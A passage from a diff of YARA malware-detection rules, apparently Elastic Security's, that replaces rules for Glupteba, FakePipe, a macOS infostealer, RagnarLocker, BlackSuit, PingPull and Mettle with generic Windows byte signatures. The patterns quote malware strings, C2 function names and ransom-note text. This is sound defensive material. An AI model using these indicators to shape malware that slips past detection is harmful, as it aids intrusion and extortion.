69 69 6A 6B 6C 6D 6E 6F 6F 70 71 72 73 74 75 75 76 77 78 79 7A 61 55 } condition: all of them } -rule ELASTIC_Windows_Trojan_Glupteba_4669Dcd6 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_D331D190 : FILE MEMORY { meta: - description = "Detects Windows Trojan Glupteba (Windows.Trojan.Glupteba)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "4669dcd6-8e04-416d-91c0-f45816430869" - date = "2021-08-08" - modified = "2021-10-04" + id = "d331d190-2b66-499e-be08-fed81e5bb5f1" + date = "2023-12-20" + modified = "2024-01-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Glupteba.yar#L26-L44" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "1b55042e06f218546db5ddc52d140be4303153d592dcfc1ce90e6077c05e77f7" - logic_hash = "64b2099f40f94b17bc5860b41773c41322420500696d320399ff1c016cb56e15" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L302-L320" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "6d869d320d977f83aa3f0e7719967c7e54c1bdae9ae3729668d755ee3397a96f" + logic_hash = "901601c892d709fa596c44df1fbe7772a9f20576c71666570713bf96727a809b" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "5b598640f42a99b00d481031f5fcf143ffcc32ef002eac095a14edb18d5b02c9" - severity = 100 + fingerprint = "504c204dd82689bacf3875b9fd56a6a865426f3dc76de1d6d6e40c275b069d66" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 40 C3 8B 44 24 48 8B 4C 24 44 89 81 AC 00 00 00 8B 44 24 4C 89 81 B0 00 } + $a1 = { 28 83 FA 03 74 04 85 D2 75 05 E8 EE 08 00 00 B8 01 00 00 00 48 83 C4 28 C3 CC CC CC CC 56 57 48 83 EC 38 48 89 CE 8B 01 FF C8 83 F8 05 77 12 48 98 48 8D 0D D1 49 00 00 48 63 3C 81 48 } condition: all of them } -rule ELASTIC_Windows_Exploit_Fakepipe_6Bc93551 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_24191082 : FILE MEMORY { meta: - description = "Detects Windows Exploit Fakepipe (Windows.Exploit.FakePipe)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "6bc93551-b528-464b-8f1f-06db58c1cb01" - date = "2024-02-28" - modified = "2024-03-21" + id = "24191082-58a7-4d1e-88d2-b4935ba5a868" + date = "2023-12-20" + modified = "2024-01-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Exploit_FakePipe.yar#L1-L22" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "545a41ccfcd0a4f09c1c62bef2dde61b52fa92abada71ab72b3f4febb9265f75" - logic_hash = "daf78c4a2db337f51054e108b5b54c8aa32300eae3bd39c5fc2d4769221c8aea" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L322-L340" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "4d20878c16d2b401e76d8e7c288cf8ef5aa3c8d4865f440ee6b44d9f3d0cbf33" + logic_hash = "a5ea76032a9c189f923d91cd03deb44bd61868e5ad6081afe63249156cbd8927" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "e2e31171486ee71bff9450966ba7b68dd0013856f1bda9ff7a30270855332c44" - severity = 100 + fingerprint = "6bf991b391b79e897fe7964499e7e86b7b8fe4f40cf17abba85cb861e840e082" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $api = "ImpersonateNamedPipeClient" - $s1 = "\\\\.\\pipe\\%ws\\pipe\\" wide nocase - $s2 = "\\\\.\\pipe\\%s\\pipe\\" wide nocase - $s3 = { 5C 00 5C 00 2E 00 5C 00 70 00 69 00 70 00 65 00 5C 00 00 19 5C 00 70 00 69 00 70 00 65 00 5C } + $a1 = { 55 8B EC 8B 45 0C 48 F7 D0 23 45 08 5D C3 55 8B EC 51 8B 45 0C 48 23 45 08 74 15 FF 75 0C FF 75 08 E8 DA FF FF FF 59 59 03 45 0C 89 45 FC EB 06 8B 45 08 89 45 FC 8B 45 FC 8B E5 5D C3 55 8B EC } condition: - $api and any of ($s*) + all of them } -rule ELASTIC_Macos_Infostealer_Encodedosascript_Eeb54A7E : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_Efdb9E81 : FILE MEMORY { meta: - description = "Detects Macos Infostealer Encodedosascript (Macos.Infostealer.EncodedOsascript)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "eeb54a7e-ebb3-4bf9-8538-2dbad9e514b9" - date = "2024-08-19" - modified = "2024-08-26" + id = "efdb9e81-9004-426e-b599-331560b7f0ff" + date = "2024-01-01" + modified = "2024-01-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Macos_Infostealer_EncodedOsascript.yar#L1-L21" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c1693ee747e31541919f84dfa89e36ca5b74074044b181656d95d7f40af34a05" - logic_hash = "2f450c9afd92f52cdd8333e39e41b7334a01ddc39371c118260820a878359742" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L342-L361" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "1c3302b14324c9f4e07829f41cd767ec654db18ff330933c6544c46bd19e89dd" + logic_hash = "eae78b07f6c31e3a30ae041a27c67553bb8ea915bc7724583d78832475021955" score = 75 quality = 71 tags = "FILE, MEMORY" - fingerprint = "7b9d3cc64f3cfbdf1f9938ab923ff06eb6aef78fce633af891f5dd6a6b38dd2d" - severity = 100 - arch_context = "x86, arm64" + fingerprint = "ce1499c8adaad552c127ae80dad90a39eb15e1e461afe3266e8cd6961d3fde79" + severity = 50 + arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "windows" strings: - $xor_encoded_osascript = "osascript" xor(0x40) - $base32_encoded_osascript = { 4E 35 5A 57 43 34 33 44 4F 4A 55 58 41 35 } - $hex_encoded_osascript = "6f7361736372697074" ascii wide nocase + $a1 = { 4D 61 78 69 6D 75 6D 43 68 65 63 6B 42 6F 78 53 69 7A 65 } + $a2 = { 56 69 73 75 61 6C 50 6C 75 73 2E 4E 61 74 69 76 65 } condition: - any of them + all of them } -rule ELASTIC_Linux_Ransomware_Ragnarlocker_9F5982B8 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_34622A35 : FILE MEMORY { meta: - description = "Detects Linux Ransomware Ragnarlocker (Linux.Ransomware.RagnarLocker)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "9f5982b8-98db-42d1-b987-451d3cb7fc4b" - date = "2023-07-27" - modified = "2024-02-13" + id = "34622a35-9ddf-4091-8b0c-c9430ecea57c" + date = "2024-01-01" + modified = "2024-01-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Ransomware_RagnarLocker.yar#L1-L21" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f668f74d8808f5658153ff3e6aee8653b6324ada70a4aa2034dfa20d96875836" - logic_hash = "c08579dc675a709add392a0189d01e05af61034b72f451d2b024c89c1299ee6c" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L363-L381" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c021c6adca0ddf38563a13066a652e4d97726175983854674b8dae2f6e59c83f" + logic_hash = "2b49bd5d3a18307a46f44d9dfeea858ddaa6084f86f96b83b874cee7603e1c11" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "782d9225a6060c23484a285f7492bb45f21c37597ea82e4ca309aedbb1c30223" - severity = 100 + fingerprint = "427762237cd1040bad58e9d9f7ad36c09134d899c5105e977f94933827c5d5e0" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a1 = ".README_TO_RESTORE" - $a2 = "If WE MAKE A DEAL:" - $a3 = "Unable to rename file from: %s to: %s" + $a1 = { 55 8B EC 81 EC 88 00 00 00 C7 45 FC 00 00 00 00 C7 45 F8 00 00 00 00 68 4C 00 00 00 E8 A3 42 00 00 83 C4 04 89 45 F4 8B D8 8B F8 33 C0 B9 13 00 00 00 F3 AB 83 C3 38 53 68 10 00 00 00 E8 82 42 } condition: - 2 of them + all of them } -rule ELASTIC_Windows_Trojan_Pingpull_09Dd9559 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_0Ff403Df : FILE MEMORY { meta: - description = "Detects Windows Trojan Pingpull (Windows.Trojan.Pingpull)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "09dd9559-ce77-4f55-9e81-3b90add40103" - date = "2022-06-16" - modified = "2022-07-18" + id = "0ff403df-cf94-43f3-b8b0-b94068f333f1" + date = "2024-01-01" + modified = "2024-01-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Pingpull.yar#L1-L25" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "de14f22c88e552b61c62ab28d27a617fb8c0737350ca7c631de5680850282761" - logic_hash = "114674b1a9acfc7643138d3b07885343a50c9d319b8d22a6ef34e916685c4469" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L383-L401" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b3119dc4cea05bef51d1f373b87d69bcff514f6575d4c92da4b1c557f8d8db8f" + logic_hash = "38bdd9b6f61ab4bb13abc7af94e92151928df95ade061756611218104e7245fd" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "b471e0f40780523bf396323a3b70fd285944fef2960ae43a36068eaf2f2fea4f" - severity = 100 + fingerprint = "3e16fe70b069579a146682d2bbeeeead63c432166b269a6d3464463ccd2bd2f8" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $s1 = "PROJECT_%s_%s_%08X" ascii fullword - $s2 = "Iph1psvc" ascii fullword - $s3 = "IP He1per" ascii fullword - $s4 = "If this service is stopped, the computer will not have the enhanced connectivity benefits that these technologies offer." - $a1 = { 02 C? 66 C7 44 24 ?? 3A 00 4C 8D 44 24 ?? 88 4C 24 ?? 48 83 C9 FF 88 44 24 ?? F2 AE 33 ?? 0F 1F } - $a2 = { 48 85 FF 74 ?? 41 C1 E0 04 0F B6 4C 3C ?? 33 D2 8D 41 ?? ?? 19 77 ?? 80 C1 E0 8D 41 ?? 3C 09 77 } - $a3 = { 4C 63 74 24 ?? 48 8B ?? 43 8D 44 36 ?? 4C 63 E8 49 8B CD E8 ?? ?? ?? ?? 48 8B ?? 48 85 C0 0F 84 } + $a1 = { 55 8B EC 81 EC 00 02 00 00 56 8B F1 57 C6 85 00 FF 63 C7 06 0C 22 41 00 0C 66 69 B6 66 01 7C 06 02 77 03 96 66 69 B6 7B 14 04 F2 05 6B 06 69 96 66 69 6F 07 C5 08 30 66 69 96 66 09 01 0A 67 0B } condition: - 3 of them + all of them } -rule ELASTIC_Linux_Trojan_Mettle_E8Fdbcbd : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_B1F6F662 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mettle (Linux.Trojan.Mettle)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "e8fdbcbd-84d3-4c42-986b-c8d5d940a96a" - date = "2024-05-06" - modified = "2024-05-21" + id = "b1f6f662-ea77-4049-a58a-ed8a97d7738e" + date = "2024-01-01" + modified = "2024-01-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mettle.yar#L1-L23" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "864eae4f27648b8a9d9b0eb1894169aa739311cdd02b1435a34881acf7059d58" - logic_hash = "d13c1e7fb815ebbefa78922e9b85a1ced015c03b8f1b2cf1885a9c483b8e0ab3" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L403-L423" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "1b7eaef3cf1bb8021a00df092c829932cccac333990db1c5dac6558a5d906400" + logic_hash = "e52ff1eaee00334e1a07367bf88f3907bb0b13035717683d9d98371b92bc45c0" score = 75 - quality = 75 + quality = 69 tags = "FILE, MEMORY" - fingerprint = "2038686308a77286ed5d13b408962075933da7ca5772d46b65e5f247193036b5" - severity = 100 - arch_context = "x86, arm64" + fingerprint = "f2cd22e34b4694f707ee9042805f5498ce66d35743950096271aaa170f44a2ee" + severity = 50 + arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $mettle1 = "mettlesploit!" - $mettle2 = "/mettle/mettle/src/" - $mettle3 = "mettle_get_c2" - $mettle4 = "mettle_console_start_interactive" - $mettle5 = "mettle_get_machine_id" + $a1 = { 67 65 74 5F 4D 53 56 61 6C 75 65 31 30 } + $a2 = { 73 65 74 5F 4D 53 56 61 6C 75 65 31 30 } + $a3 = { 67 65 74 5F 4D 53 56 61 6C 75 65 31 31 } condition: - 2 of ($mettle*) + all of them } -rule ELASTIC_Linux_Trojan_Mettle_813B9B6C : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_2C80562D : FILE MEMORY { meta: - description = "Detects Linux Trojan Mettle (Linux.Trojan.Mettle)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "813b9b6c-946d-46f0-a255-d06ab78347d4" - date = "2024-05-06" - modified = "2024-05-21" + id = "2c80562d-2377-43b2-864f-0f122530b85d" + date = "2024-01-01" + modified = "2024-01-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mettle.yar#L25-L52" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "bb651d974ca3f349858db7b5a86f03a8d47d668294f27e709a823fa11e6963d7" - logic_hash = "a6a9cf424bf1ca7985e1c4b14123ed236208ffa3f7c9ffebbdd85765a90bfa54" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L425-L445" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "ee8decf1e8e5a927e3a6c10e88093bb4b7708c3fd542d98d43f1a882c6b0198e" + logic_hash = "07487ae646ac81b94f940c8d3493dbee023bce687297465fe09375f40dff0fb2" score = 75 - quality = 75 + quality = 69 tags = "FILE, MEMORY" - fingerprint = "6b350abfda820ee4c6e7aa84f732ab4527c454b93ae13363747f024bb8c5e3b4" - severity = 100 + fingerprint = "30965c0d6ac30cfb10674b2600e5a1e7b14380072738dd7993bd3eb57c825f24" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $process_set_nonblocking_stdio = { 55 89 E5 53 83 EC 08 E8 ?? ?? ?? ?? 81 C3 3D 32 0D 00 6A 00 6A 03 6A 00 E8 ?? ?? ?? ?? 83 C4 0C 80 CC 08 50 6A 04 6A 00 E8 ?? ?? ?? ?? 83 C4 0C 6A 00 6A 03 6A 01 E8 ?? ?? ?? ?? 83 C4 0C 80 CC 08 50 6A 04 6A 01 E8 } - $process_create = { 55 89 E5 57 56 53 81 EC 98 00 00 00 E8 ?? ?? ?? ?? 81 C3 A6 3B 0D 00 89 45 84 89 95 78 FF FF FF 89 4D 80 8B 7D 0C 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 10 40 0F ?? ?? ?? ?? ?? 50 50 68 B4 00 00 00 6A 01 E8 ?? ?? ?? ?? 89 C6 83 C4 10 85 C0 0F ?? ?? ?? ?? ?? F6 47 14 80 74 ?? 6A 00 6A 00 6A 00 8D 45 ?? 50 E8 ?? ?? ?? ?? 89 85 7C FF FF FF } - $process_read = { 55 89 E5 57 56 53 83 EC 1C E8 ?? ?? ?? ?? 81 C3 90 30 0D 00 8B 4D 08 8B 7D 0C 8B 75 10 83 C8 FF 85 C9 74 ?? 52 56 57 FF 71 24 89 4D E4 E8 ?? ?? ?? ?? 89 C2 83 C4 10 39 C6 8B 4D E4 76 ?? 50 29 D6 56 01 D7 89 55 E4 57 FF 71 48 E8 ?? ?? ?? ?? 8B 55 E4 01 C2 83 C4 10 89 D0 8D 65 ?? 5B 5E 5F 5D C3 } - $file_new = { 83 C4 10 52 52 50 FF 76 0C E8 ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 83 C4 10 8D 65 ?? 5B 5E 5F 5D C3 } - $file_read = { 55 89 E5 53 83 EC 10 E8 ?? ?? ?? ?? 81 C3 41 A7 0D 00 FF 75 08 E8 ?? ?? ?? ?? 50 FF 75 10 6A 01 FF 75 0C E8 ?? ?? ?? ?? 8B 5D FC C9 C3 } - $file_seek = { 55 89 E5 53 83 EC 10 E8 ?? ?? ?? ?? 81 C3 C0 A6 0D 00 FF 75 08 E8 ?? ?? ?? ?? 83 C4 0C FF 75 10 FF 75 0C 50 E8 ?? ?? ?? ?? 8B 5D FC C9 C3 } - $func_write_audio_file = { 55 89 E5 57 56 53 83 EC 18 E8 ?? ?? ?? ?? 81 C3 D8 23 0D 00 FF 75 08 E8 ?? ?? ?? ?? 89 C6 8B 45 10 03 06 89 06 5A 59 50 FF 76 04 E8 ?? ?? ?? ?? 89 C7 89 46 04 83 C4 10 83 C8 FF 85 FF 74 ?? 2B 7D 10 8B 06 01 F8 89 C7 8B 75 0C 8B 4D 10 F3 ?? 8B 45 10 8D 65 ?? 5B 5E 5F 5D C3 } - $func_is_compatible_elf = { 55 89 E5 56 53 E8 ?? ?? ?? ?? 81 C3 CF AB 05 00 8B 55 08 31 C0 81 3A 7F 45 4C 46 75 ?? 80 7A 04 01 75 ?? 0F B6 72 05 83 EC 0C 6A 01 E8 ?? ?? ?? ?? 83 C4 10 48 0F 94 C0 0F B6 C0 40 39 C6 0F 94 C0 0F B6 C0 83 E0 01 8D 65 ?? 5B 5E 5D C3 } - $func_stack_setup = { 89 DA 31 C0 8B 0C 86 85 C9 8D 40 ?? 74 ?? 89 0A 83 C2 04 EB ?? C7 02 00 00 00 00 C7 04 83 00 00 00 00 EB ?? 83 EC 0C 53 E8 ?? ?? ?? ?? 83 C4 10 8B 45 DC 89 45 10 8B 45 E0 89 45 0C 89 5D 08 8D 65 ?? 5B 5E 5F 5D } - $func_c2_new_struct = { C7 46 14 00 00 00 00 C7 46 10 00 00 00 00 C7 46 18 00 00 00 00 8D 83 ?? ?? ?? ?? 89 46 20 C7 46 24 00 00 00 00 C7 46 28 00 00 00 00 C7 46 2C 00 00 00 00 C7 46 30 00 00 F0 3F 89 76 1C 83 EC 0C 56 E8 } + $a1 = { 50 6F 6C 79 6D 6F 64 58 54 2E 65 78 65 } + $a2 = { 50 6F 6C 79 6D 6F 64 58 54 20 76 31 2E 33 } + $a3 = { 50 6F 6C 79 6D 6F 64 20 49 6E 63 2E } condition: - 2 of ($process*) and 2 of ($file*) and 2 of ($func*) + all of them } -rule ELASTIC_Linux_Trojan_Mettle_78Aead1C : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_E96F9E97 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mettle (Linux.Trojan.Mettle)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "78aead1c-7dc2-4db0-a0b8-cccf2d583c67" - date = "2024-05-06" - modified = "2024-05-21" + id = "e96f9e97-cb44-42e5-a06b-98775cbb1f2f" + date = "2024-01-01" + modified = "2024-01-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mettle.yar#L54-L81" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "864eae4f27648b8a9d9b0eb1894169aa739311cdd02b1435a34881acf7059d58" - logic_hash = "d68d37379b8a3a2d242030fd14884781488e9785823aa25fedfdd406748f8039" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L447-L465" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "bfbab69e9fc517bc46ae88afd0603a498a4c77409e83466d05db2797234ea7fc" + logic_hash = "1dcf81b8982425ff74107b899e85e2432f0464554e923f85a7555cda65293b54" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "bf2b8bd0e12905ab4bed94c70dbd854a482446909ba255fceaee309efd69b835" - severity = 100 + fingerprint = "2277fb0b58f923d394f5d4049b6049e66f99aff4ac874849bdc1877b9c6a0d3e" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $process_set_nonblocking_stdio = { 48 83 EC 08 31 D2 BE 03 00 00 00 31 FF 31 C0 E8 ?? ?? ?? ?? 80 CC 08 BE 04 00 00 00 31 FF 89 C2 31 C0 E8 ?? ?? ?? ?? 31 D2 BE 03 00 00 00 BF 01 00 00 00 31 C0 E8 ?? ?? ?? ?? 80 CC 08 BE 04 00 00 00 BF 01 00 00 00 89 C2 31 C0 E8 } - $process_create = { 41 57 41 56 49 89 CE 41 55 41 54 4D 89 C5 55 53 48 89 FB 48 89 D5 48 81 EC 88 00 00 00 48 8D ?? ?? ?? 48 89 34 24 E8 ?? ?? ?? ?? FF C0 0F ?? ?? ?? ?? ?? BE 20 01 00 00 BF 01 00 00 00 E8 ?? ?? ?? ?? 48 85 C0 49 89 C7 0F ?? ?? ?? ?? ?? 41 F6 45 28 80 74 ?? 48 8D ?? ?? ?? 31 C9 31 D2 31 F6 E8 ?? ?? ?? ?? 85 C0 } - $process_read = { 48 85 FF 74 ?? 41 55 41 54 49 89 FD 55 53 48 89 D5 49 89 F4 48 83 EC 08 48 8B 7F 38 E8 ?? ?? ?? ?? 48 39 C5 48 89 C3 76 ?? 49 8B 7D 70 48 89 EA 49 8D ?? ?? 48 29 C2 E8 ?? ?? ?? ?? 48 01 C3 5A 48 89 D8 5B 5D 41 5C 41 5D C3 } - $file_new = { 41 54 55 48 89 F5 53 48 89 FB 48 8B 7F 10 BE B2 04 01 00 E8 ?? ?? ?? ?? 48 8B 7B 10 BE B3 04 01 00 49 89 C4 E8 ?? ?? ?? ?? 48 85 C0 75 ?? 48 8D ?? ?? ?? ?? ?? 48 89 C6 4C 89 E7 E8 ?? ?? ?? ?? 83 CA FF 48 85 C0 74 ?? 48 89 C6 48 89 EF E8 ?? ?? ?? ?? 31 D2 5B 89 D0 5D 41 5C C3 } - $file_read = { 53 48 89 F3 48 83 EC 10 48 89 54 24 08 E8 ?? ?? ?? ?? 48 8B 54 24 08 48 83 C4 10 48 89 DF 5B 48 89 C1 BE 01 00 00 00 E9 } - $file_seek = { 48 83 EC 18 48 89 74 24 08 89 54 24 04 E8 ?? ?? ?? ?? 8B 54 24 04 48 8B 74 24 08 48 89 C7 48 83 C4 18 E9 } - $func_write_audio_file = { 41 54 55 49 89 F4 53 48 89 D3 E8 ?? ?? ?? ?? 48 8B 30 48 8B 78 08 48 89 C5 48 01 DE 48 89 30 E8 ?? ?? ?? ?? 48 89 C7 48 89 45 08 48 83 C8 FF 48 85 FF 74 ?? 48 8B 45 00 48 29 DF 4C 89 E6 48 89 D9 48 01 F8 48 89 C7 48 89 D8 F3 ?? 5B 5D 41 5C C3 } - $func_is_compatible_elf = { 31 C0 81 3F 7F 45 4C 46 75 ?? 80 7F 04 02 75 ?? 53 0F B6 5F 05 BF 01 00 00 00 E8 ?? ?? ?? ?? FF C8 0F 94 C0 0F B6 C0 FF C0 39 C3 0F 94 C0 0F B6 C0 83 E0 01 5B C3 83 E0 01 C3 } - $func_stack_setup = { 48 89 EA 31 C0 49 8B 0C C0 48 FF C0 48 85 C9 74 ?? 48 89 0A 48 83 C2 08 EB ?? 48 C7 02 00 00 00 00 48 C7 44 C5 00 00 00 00 00 EB ?? 48 89 EF 4C 89 4C 24 08 E8 ?? ?? ?? ?? 4C 8B 4C 24 08 48 83 C4 10 48 89 DA 48 89 EF 5B 5D 41 5C 4C 89 CE } - $func_c2_new_struct = { 48 89 DF 48 C7 43 20 00 00 00 00 C7 43 28 00 00 00 00 48 C7 43 40 00 00 00 00 48 89 43 38 48 8B 05 D1 BE 09 00 48 89 5B 30 48 89 43 48 E8 } + $a1 = { 7A 47 4D 5E 5A 4D 5D 4B 7D 6D 4A 41 57 4B 54 49 5F 4C 67 6D 54 52 5B 51 46 43 6F 71 40 46 45 53 67 7C 5D 6F } condition: - 2 of ($process*) and 2 of ($file*) and 2 of ($func*) + all of them } -rule ELASTIC_Linux_Ransomware_Blacksuit_9F53E7E5 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_005Fd471 : FILE MEMORY { meta: - description = "Detects Linux Ransomware Blacksuit (Linux.Ransomware.BlackSuit)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "9f53e7e5-7177-4e17-ac12-9214c4deddf2" - date = "2023-07-27" - modified = "2024-02-13" + id = "005fd471-d968-4ece-a61d-91beac4c1e34" + date = "2024-01-01" + modified = "2024-01-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Ransomware_BlackSuit.yar#L1-L21" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "1c849adcccad4643303297fb66bfe81c5536be39a87601d67664af1d14e02b9e" - logic_hash = "121e0139385cfef5dff394c4ea36d950314b00c6d7021cf2ca667ee942e74763" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L467-L487" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "502814ed565a923da15626d46fde8cc7fd422790e32b3cad973ed8ec8602b228" + logic_hash = "10493253a6b2ce3141ee980e0607bdbba72580bb4a076f2f4636e9665ffc6db8" score = 75 - quality = 50 + quality = 69 tags = "FILE, MEMORY" - fingerprint = "34355cb1731fe6c8fa684a484943127f8fdf3814d45025e29bdf25a08b4890fd" - severity = 100 + fingerprint = "30afbb04c257c20ccd2cff15f893715187b7e7b66a9c9f09d076d21466e25a57" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a1 = "esxcli vm process list > list_" fullword - $a2 = "Drop readme failed: %s(%d)" fullword - $a3 = "README.BlackSuit.txt" fullword + $a1 = { 5F 3F 44 4B 4B 66 25 37 2A 5E 70 42 70 } + $a2 = { 71 5A 3E 7D 6F 5D 6E 2D 74 48 5E 55 55 22 3C } + $a3 = { 3E 2D 21 47 45 6A 3C 33 23 47 5B 51 } condition: - 2 of them + all of them } -rule ELASTIC_Linux_Cryptominer_Casdet_5D0D33Be : FILE MEMORY +rule 